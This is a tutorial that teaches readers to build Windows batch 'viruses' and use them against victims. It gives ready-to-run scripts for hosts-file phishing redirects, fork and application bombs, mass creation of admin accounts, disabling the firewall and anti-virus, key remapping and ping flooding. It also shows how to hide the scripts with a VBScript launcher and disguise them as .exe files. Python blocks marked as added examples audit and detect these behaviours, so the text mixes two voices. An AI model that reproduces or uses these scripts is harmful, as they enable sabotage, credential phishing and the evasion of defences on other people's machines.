Howdy! In this article we are going to learn how to create some virus programs with the help of batch scripts.
Let’s get on to the grey side of batch programming. Wait, wait, what is batch programming in the first place?
Don’t worry, by the end of this article you will have learned what batch programming is, along with some cool stuff like virus programming with batch scripts.
1. What is batch?
Simply put, the general meaning of batch is a collection of things treated as one unit. Technically, here it means a set of commands.
A batch file contains a set of commands which are executed at the operating system level. Batch files usually have the .bat extension. These files are interpreted line by line by the command line interpreter cmd.exe in all of the DOS operating system family, like FreeDOS and MS-DOS. In Unix-like operating systems the batch file is called a shell script. A batch of commands executed in a single script is called a batch script.
2. What is batch programming?
It is a native programming language for Windows which deals with DOS commands as a sequence. Batch files are programmed as a set of commands which are executed line by line. This sequence of commands is used for lower-level operations on disks and at the operating system level, such as deleting files of the same or different types, clearing system processes, killing tasks, scheduling process IDs, clearing some errors in the operating system, etc.
Programs that automate tasks like deleting temporary files, or any other actions, can be created using batch programming in Windows and shell scripting in Linux.
What are the modes in batch?
There are two types of batch modes.
- interactive mode.
In this mode human interaction is needed to perform the task after the file is executed. Operations are carried out based on the human input. For example, the program asks whether you really want to delete a file, or how many times you want a particular thing to be done.
- batch mode (silent mode).
This mode is the complete opposite of interactive mode. After the batch file is executed, everything is done silently in the background. There is no need for human interaction in this mode, and no inputs or instructions are needed from our side.
Now we are going to build our batch virus in this mode. But before that, we need to be familiar with the commands which are going to be used.
3. Types of batch commands.
- internal commands.
Internal commands are those which come by default with the operating system; in other words, we call them built-in commands. For example, dir, cls, echo, del and many more.
- external commands.
External commands are the commands that often become available after installing an application. Mostly, some external commands will only work in the Run box. For example: PsExec, PsFile, PsGetSid, PsInfo, PsKill, PsList, PsLoggedOn and so on.
“cd” - change directory.
“: and goto” - used to implement loops.
“echo” - print.
“echo off” - stop printing the commands of the batch file as they execute.
“call” - used for triggering or calling files and commands.
“start” - to start applications and services.
“net users” - adds or modifies user accounts, or displays user account information.
“%random%” - environment variable.
“net stop” - used for stopping services of user accounts.
“reg add” - adding content to the registry editor.
“ping” - sending packets over the network to find whether a host is alive or dead.
4. How to create a batch program?
To create a batch program, open any text editor, write some commands and save the file with the .bat extension. That’s it, you’ll get an executable batch program.
5. Programming viruses for Windows machines.
Before we start, a small caution: all the information in this article is for educational purposes only. We are not responsible for the things you do. Let’s get started with
Folder Replicator Virus:
cd\ cd C:\Users\username\Desktop :loop md Virus cd Virus goto loop
Save it as a batch file with the .bat extension. Before doing that, modify the code by replacing ‘username’ with the currently logged-in username. That is the path where you want to see the magic; the folder replication will happen at that location. Then run it on the victim’s computer to infect it.
It doesn’t cause much harm anyhow, but it replicates a folder inside a folder and goes on. This creates a directory inside another directory with the same name, so it doesn’t look like a mess, since everything resides inside one main directory. Moreover, deleting the root directory will purge everything done by this piece of code.
DNS poisoning:
A batch file can modify the DNS hosts file that resides at ‘C:\windows\system32\drivers\etc\hosts’, so that it takes you to some malicious website instead of the legitimate website. This may also be used for phishing, i.e. redirecting you to a fake website, created by hackers, which looks exactly like the legitimate one, and then stealing credentials. But this script needs administrative privileges.
@echo off echo 10.109.74.45 www.google.com >> C:\windows\system32\drivers\etc\hosts echo 10.115.46.73 www.paypal.com >> C:\windows\system32\drivers\etc\hosts exit
This program creates new entries in the hosts file, so that whenever the user attempts to reach that site he/she will be redirected to the fake phishing site hosted on the IP we have set. In the above case, whenever the user tries to open www.paypal.com he/she will be redirected to 10.115.46.73, where the hacker will have built a fake PayPal site which looks exactly the same as the original legitimate site, so that he can capture the credentials when they are entered.
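From the defender's side, entries like these are easy to find by auditing the hosts file. The following Python code is an added example, not part of the original article: it parses hosts-file text and flags overrides of watched domains and fully qualified names pinned to private addresses. The watch list, function name and sample text are assumptions made for illustration.

```python
import ipaddress

# Domains expected to resolve through DNS, never through a local override
# (assumed watch list; extend it for your environment).
WATCHED = {"www.google.com", "www.paypal.com"}

def audit_hosts(text, watched=WATCHED):
    """Return (line_no, ip, hostname, reason) for suspicious hosts entries."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        fields = line.split()
        if len(fields) < 2:                      # blank or incomplete line
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            findings.append((n, fields[0], " ".join(fields[1:]),
                             "unparseable address"))
            continue
        for host in (h.lower().rstrip(".") for h in fields[1:]):
            if host in watched:
                findings.append((n, str(ip), host, "watched domain overridden"))
            elif "." in host and ip.is_private and not ip.is_loopback:
                # Heuristic: may also match legitimate intranet pins.
                findings.append((n, str(ip), host,
                                 "FQDN pinned to private address"))
    return findings

# Constructed sample: default entries plus the two entries discussed above.
SAMPLE = """\
# sample hosts file
127.0.0.1 localhost
::1 localhost
10.109.74.45 www.google.com
10.115.46.73 www.paypal.com
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE):
        print(finding)
```

Running the same audit on a schedule and comparing the result with a known-good baseline catches later changes as well.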
Fork Bombing:
Most of us have heard of ‘fork()’, which is used to create a new process. Likewise, fork bombing is nothing but a program calling itself again and again in an infinite loop, making the system crash by popping up hundreds of windows on the screen.
@echo off :loop Explorer Call forkBomb.bat Goto loop
Copy the above program, paste it into a Notepad file and save it as ‘forkBomb.bat’. The explorer command inside the file makes File Explorer open; then, because of the loop, the same batch file is called again, which in turn opens more File Explorer windows. It goes on calling itself again and again until the system crashes or hangs.
Application Bomber:
Application bomber is much like the fork bombing that we have just seen, but here, when the file is executed, it starts opening all the applications listed in the file, and the loop continues until the user closes the cmd terminal in which the batch file is running.
@echo off :loop start notepad start winword start mspaint start write start cmd start explorer start control start firefox start msconfig goto loop
This batch program opens applications such as Notepad, MS Word, Microsoft Paint, WordPad, Command Prompt, File Explorer, Control Panel and Firefox in an infinite loop, causing the system to collapse; as a result the system simply crashes or reboots.
User Flooder:
User flooder is a program which floods the system with user accounts. It creates a lot of user accounts on the system on which it is executed.
@echo off :usrflood set usr=%random% net users %usr% %random% /add net localgroup administrators %usr% /add goto usrflood
User accounts are created with a random number as the username, taken from the environment variable “%random%”. The password is also assigned directly by the program, and it is also a random number. All the user accounts are given administrator rights.
Matrix Folder flooder:
The following program floods your computer with folders. It tends to create more than 3000 folders, named with random numbers, in less than a minute.
@echo off :loop mkdir %random% goto loop
Above is a screenshot from my desktop; in the top left corner you can see the batch file named flood. I ran that file for only 2 seconds and it messed up my desktop, that’s why Hulk looks more angry!
Service Disabler:
Yes! What you are thinking is right. The code snippet below stops some critical Windows services.
@echo off net stop "Windows Firewall" net stop "Windows Update" net stop Workstation net stop "DHCP Client" net stop "DNS Client" net stop "Print Spooler" net stop Themes exit
This program stops the above-mentioned system services. The thing I like most about this piece of code is that it can also stop the services of anti-virus, so that we can do more malicious activities that the anti-virus can’t stop anymore. The victim needs to enable or start the stopped services manually.
Keystroke Re-mapper:
The following batch snippet re-maps a keystroke by changing the ‘scancodemap’ entry in the registry editor. The code here changes the key from A to B, so that if a user presses the ‘a’ key on the keyboard, ‘b’ is displayed on the screen. Likewise, you may map any keys.
@echo off reg add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "ScancodeMap" /t REG_BINARY /d 00000000000000000200000030001e0000000000 exit
If you want to get your hands dirty remapping other keys, you have to refer to the pre-assigned ascii codes for each key.
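The binary value written above can be decoded to see exactly which key is affected, which is also how an existing remap on a machine can be audited. This Python decoder is an added example, not code from the original article; the function names are hypothetical and the key-name table is a small constructed excerpt. The two-byte codes inside the value are keyboard scan codes.

```python
import struct

# Constructed excerpt of scan-code names, enough for this example.
KEY_NAMES = {0x1E: "A", 0x30: "B", 0x1D: "LeftCtrl", 0x3A: "CapsLock"}

def decode_scancode_map(hex_data):
    """Decode a scancode-map REG_BINARY value into (physical, emitted) pairs.

    Layout: version (4 bytes), flags (4 bytes), entry count (4 bytes, counts
    the null terminator), then one 4-byte entry per mapping. Each entry holds
    two little-endian words: the code to emit, then the physical key's code.
    """
    data = bytes.fromhex(hex_data)
    if len(data) < 16 or len(data) % 4:
        raise ValueError("value too short or not DWORD-aligned")
    _version, _flags, count = struct.unpack_from("<III", data, 0)
    if len(data) != 12 + 4 * count:
        raise ValueError("entry count does not match data length")
    mappings = []
    for i in range(count):
        emitted, physical = struct.unpack_from("<HH", data, 12 + 4 * i)
        if emitted == 0 and physical == 0:       # null terminator
            break
        mappings.append((physical, emitted))
    return mappings

def describe(mappings):
    """Render mappings as readable strings; emitted code 0 disables a key."""
    def name(code):
        return KEY_NAMES.get(code, hex(code))
    return [
        f"pressing {name(p)} is disabled" if e == 0
        else f"pressing {name(p)} produces {name(e)}"
        for p, e in mappings
    ]

# The value from the reg add command in this article.
PAGE_VALUE = "00000000000000000200000030001e0000000000"

if __name__ == "__main__":
    print(describe(decode_scancode_map(PAGE_VALUE)))
```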
Packet flooder:
Packet flooder acts like a ping of death. It slows down a computer on your network once you enter that system’s IP address in the code. One disadvantage of this code is that it also slows down our own system, because it opens a lot of cmd terminals, which leads to a flood of terminals on your system.
@echo off :loop ping -l 65535 -t 192.168.1.101 start pingflooder.bat goto loop
Or else you can run this code on the victim system and enter the IP address of the victim itself, so it becomes a two-way attack.
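Several of the scripts above leave the same trace in process-creation logs: external programs such as net, reg and ping started over and over from a loop. The following Python code is an added example, not part of the original article: it matches process command lines against patterns for those behaviours and flags bursts. The rule names, thresholds and sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Added heuristics for the behaviours described in this article; not a
# vendor rule set. Each pattern is matched against a process command line.
RULES = {
    "account_create": re.compile(r"\bnet1?(\.exe)?\s+users?\s+\S+.*\s/add\b", re.I),
    "admin_group_add": re.compile(
        r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "service_stop": re.compile(r"\bnet1?(\.exe)?\s+stop\s+", re.I),
    "keyboard_reg": re.compile(r"\breg(\.exe)?\s+add\s+.*Keyboard Layout", re.I),
    "oversize_ping": re.compile(r"\bping(\.exe)?\s+.*-l\s+6\d{4}\b", re.I),
}

def triage(events, window=60, burst=5):
    """events: iterable of (epoch_seconds, command_line).

    Returns {rule: {"hits": n, "burst": bool}}. burst is True when at least
    `burst` hits fall inside one `window`-second span, as a looping script
    would produce.
    """
    times = defaultdict(list)
    for ts, cmd in events:
        for rule, rx in RULES.items():
            if rx.search(cmd):
                times[rule].append(ts)
    report = {}
    for rule, stamps in times.items():
        stamps.sort()
        is_burst = any(
            stamps[i + burst - 1] - stamps[i] <= window
            for i in range(len(stamps) - burst + 1)
        )
        report[rule] = {"hits": len(stamps), "burst": is_burst}
    return report

# Constructed sample events (timestamps in seconds), not real telemetry.
SAMPLE = [(1000 + i, f"net users {20000 + i} {30000 + i} /add") for i in range(6)]
SAMPLE += [(1000 + i, f"net localgroup administrators {20000 + i} /add")
           for i in range(6)]
SAMPLE += [(1010, 'net stop "Windows Firewall"'),
           (1020, "net use Z: \\\\fileserver\\share")]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Commands built into cmd.exe, such as mkdir and echo, do not start a new process, so folder flooding and hosts-file edits need file-system monitoring instead.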
Stealthy Virus using VBscript:
The only problem with all of the above batch virus code is that it opens a cmd terminal when executed, so the victim will be aware of something abnormal. So, we are going to make these viruses run in stealth mode.
Set objShell = CreateObject("WScript.Shell") strCommand = "C:\yourfile.bat" objShell.Run strCommand, vbHide, TRUE
All you need to do is copy the path of your batch virus, including its name and extension, and paste it into the above VBScript (Visual Basic). There is no need to execute the batch file; it is enough to execute this VBScript, which makes the batch file execute in stealth mode, running hidden in the background. This file needs to be saved with the .vbs extension. This will make our virus hidden while executing. The only way to end the process is to open the task manager and kill the process that says WScript.
Converting batch files into executable files:
Up to now we have seen a lot of things: creating virus programs and making them stealthy while executing on the victim’s computer. One more thing: if the victim is aware of batch programming, there is a chance that he will open your source code. To decrease that possibility we can convert the .bat extension to .exe, so that it looks like an executable file and it becomes hard for people to find out what the program exactly does.
To download the converter go to this link: www.f2ko.de/en/b2e.php
Or else you can try online also.
That’s all I have for this article. Hope you like it, happy hacking!!!